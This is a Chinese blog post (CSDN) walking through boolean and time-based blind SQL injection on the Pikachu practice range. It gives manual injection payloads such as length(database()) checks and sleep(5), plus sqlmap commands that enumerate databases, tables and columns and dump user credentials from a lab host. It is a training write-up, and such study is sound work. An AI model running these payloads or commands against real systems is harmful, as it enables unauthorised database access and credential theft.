[Pikachu靶场实战系列] SQL注入(盲注)

最新推荐文章于 2024-07-12 14:29:08 发布
最新推荐文章于 2024-07-12 14:29:08 发布
阅读量3.3k 收藏 23
点赞数 4
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45813980/article/details/119216588
版权

目录

盲注

盲注的意思就是说页面没有明显的回显,我们只能通过其他方式判断注入点。
常见的方式有两种,一种是布尔盲注,通过页面返回的不同状态判断语句是否被执行。另一种是时间盲注,通过页面加载时间来判断语句是否被执行。

布尔盲注

在这里插入图片描述
先输入一个之前关卡中的名字,返回正常
在这里插入图片描述
加上单引号,并没有报错,而是返回了我输入的信息不存在
在这里插入图片描述
加上注释符号后,返回又正常了,说明注入点存在,且就是单引号闭合
在这里插入图片描述
判断数据库名的长度

lucy’and length(database())>=1 #

在这里插入图片描述

lucy’and length(database())>=7 #

在这里插入图片描述

lucy’and length(database())>=8 #

在这里插入图片描述
说明数据库长度为7,根据之前的关卡,数据库为pikachu,确实长度为7。接下来要爆破数据库的名字,要一个字母一个字母爆破,手动爆破是十分复杂和耗费时间的。所以我们可以使用sqlmap工具或是自己写脚本进行爆破。

我这里使用sqlmap
查询数据库名:

python sqlmap.py -u “http://5749b9ee554a4ddb941b425ad59d8ced.app.mituan.zone/vul/sqli/sqli_blind_b.php?name=lucy&submit=查询” --current-db

在这里插入图片描述
爆表

python sqlmap.py -u “http://5749b9ee554a4ddb941b425ad59d8ced.app.mituan.zone/vul/sqli/sqli_blind_b.php?name=lucy&submit=查询” -D pikachu --tables

在这里插入图片描述
爆users表的列

python sqlmap.py -u “http://5749b9ee554a4ddb941b425ad59d8ced.app.mituan.zone/vul/sqli/sqli_blind_b.php?name=lucy&submit=查询” -D pikachu -T users --columns

在这里插入图片描述
爆username 和password的值
在这里插入图片描述

时间盲注

输入lucy
在这里插入图片描述
加上单引号
在这里插入图片描述
返回结果都一样,这样怎么判断是否有注入点呢?我们可以采用时间注入的方式。

使用下面的pyload,点击查询后,过5s页面才返回下面的一句话,说明sleep(5)被执行了,说明页面可以执行我们构造的语句,只是没有回显,那么我们就可以用类似布尔盲注的方法进行时间盲注,报错出所要查询的信息。

lucy’ and sleep(5) #

在这里插入图片描述
还是使用salmap
爆出所有的数据库

python sqlmap.py -u “http://5749b9ee554a4ddb941b425ad59d8ced.app.mituan.zone/vul/sqli/sqli_blind_t.php?name=lucy&submit=%E6%9F%A5%E8%AF%A2” --dbs

在这里插入图片描述
pyload和布尔盲注一样,不得不说,sqlmap真好用。剩下的就不举例了,参考之前的即可。

00勇士王子
关注
  • 4
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pikachu靶场SQL注入.docx
09-13
"Pikachu靶场SQL注入" Pikachu靶场SQL注入是针对Web应用程序的一种攻击手段,通过对Web应用程序的输入参数进行tampering,来达到访问数据库的目的。下面是Pikachu靶场SQL注入的详细知识点: 一、数字型注入(POST...
Pikachu靶场通关笔记--Sql Inject(SQL注入)
weixin_45908624的博客
12-09 3027
sql注入
Pikachu布尔盲注结合BurpSuite获取数据库名字详解
小小小屿屿屿的博客
11-18 509
有些情况下,开发人员屏蔽了报错信息,导致攻击者无法通过报错信息进行注入的判断。这种情况下的注入,称为盲注盲注根据展现方式,分为布尔型盲注和时间型盲注
盲注及sqli-labs靶场分析
最新发布
2301_80679350的博客
07-12 1488
盲注SQL注入攻击的一种形式,在盲注攻击中,攻击者无法直接从应用程序的响应中获得数据库中的数据,而只能通过观察应用程序在不同输入下的行为(通常是通过错误消息或不同的页面响应)来推断数据库中的信息。
pikachu靶场sql注入)(delete和http头部注入和盲注
weixin_54431413的博客
03-16 3695
pikachu盲注,delete和http头部注入
pikachu靶场 SQL-inject
Al_1的博客
10-03 936
数字型注入,字符型注入,搜索型注入,xx型注入,增改注入,删除注入,请求头注入,布尔盲注,时间盲注,宽字节盲注
pikachu SQL 注入(盲注
weixin_60508121的博客
04-19 3790
SQL盲注 1.判断是否存在注入点 kobe' and 1=1# 正常返回结果 kobe' and 1=2# 返回空结果 2 2.猜测数据库长度(burp探测) kobe' and length(database())>=k # 数据库的长度为7 2. 猜测数据库名 kobe' and (select substr(database(),1,1))='k'# 得到数据库名为pikachu 3.盲注表名猜测 kobe' and length((sele..
PIKACHU--SQL注入
鲨鱼辣椒的博客
05-17 1661
SQL Inject(SQL)概述 注入漏洞在全球漏洞排行榜上一直高居榜首而注入漏洞中首当其冲的就是数据库注入漏洞,SQL注入漏洞主要的成因是子啊数据交互中,前端数据传入到后台处理时,没有做严格的过滤,导致传入后台的“数据”拼接到SQL语句中后,被当成SQL语句的一部分执行,从而产生与原本语句截然不同的意思,导致数据库受损(被脱裤、删除、甚至整个服务器权限沦陷) SQL注入流程 注入点探测 手动方式:手工构造SQL语句进行注入点发现 自动方式:采用自动扫描工具,自动进行注入点发现 信息获取 通过
pikachu靶场全部通关.pdf
08-16
由于在有道云写的,不好发博客,只能这样子,个人结合B站视频,总结
pikachu靶场全通关教程
07-20
这个是刚开始学网络安全渗透的靶场练习心得,分享给大家
sql注入 pikachu post数字型注入
08-12
SQL 注入 Pikachu Post 数字型注入 SQL 注入是一种常见的 Web 应用安全漏洞,攻击者可以通过在输入字段中注入恶意的 SQL 语句来获取或修改敏感数据。在本文中,我们将探讨一种新的 Post 数字型注入方法,即使用 ...
pikachu靶场环境
02-12
在"Pikachu靶场"中,用户通常会遇到各种网络安全挑战,包括但不限于Web应用漏洞挖掘(如SQL注入、XSS跨站脚本攻击、文件包含漏洞等)、网络服务漏洞利用(如FTP、SMTP、SSH等服务的漏洞)、密码学概念应用(如加密与...
pikachu盲注
miaositekali的博客
02-21 283
pikachu盲注
pikachu——布尔盲注
Lollipop_zhi的博客
03-02 6589
基于boolean的盲注主要表现: 1.没有报错信息 2.不管是正确的输入,还是错误的输入,都只显示两种情况(我们可以认为是0或者1) 3.在正确的输入下,输入and 1=1/and 1= 2发现可以判断 首先用’来测试一下 然后输入kobe’ and 1=1#,当改成1=2时,显示“不存在”。此时,说明存在SQL注入点,因为会把我们输入的 1=1,1=2执行 输入kobe’ and ascii(substr(database(),1,1))>113# 显示“不存在” (因为手工
pikachu靶场通关之sql注入
qq_74825121的博客
01-21 2678
pikachu靶场通关之sql注入
一文了解pikachuSQL注入
allintao的博客
03-01 2758
本文章主要讲解关于pikachu的注入方式。目录一、数字型注入(post)二、字符型注入(get)三、搜索型注入四、xx型注入五、"insert/update"注入六、"delete"注入七、"http header"注入八、盲注(base on boolian)九、盲注(base on time)十、宽字节注入。
pikachu靶场学习2
weixin_62870602的博客
04-18 3252
pikachu靶场学习2
Pikachu靶场——SQL注入漏洞
来日可期的博客
10-06 1952
SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。
SQL注入——————pikachu靶场
qq_61579604的博客
10-16 233
修改后。
pikachu靶场通关sql注入
08-10
Pikachu靶场中,SQL注入是一种常见的攻击方法。参与者可以通过注入恶意代码来绕过应用程序的安全性,从而获取敏感信息或者对数据库进行修改。在注入的过程中,可以使用不同的技术和payload来实现攻击。例如,数字型注入、字符型注入、搜索型注入、XX型注入、insert注入、delete注入、http header注入、盲注和宽字节注入等。你也可以使用Python脚本来进行注入测试,根据注入类型和目标网址构造合适的payload来发送请求。123 #### 引用[.reference_title] - *1* [Pikachu靶场sql注入通关](https://blog.csdn.net/oiadkt/article/details/129385178)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [pikachu靶场通关之sql注入系列](https://blog.csdn.net/qq_51902218/article/details/120333234)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值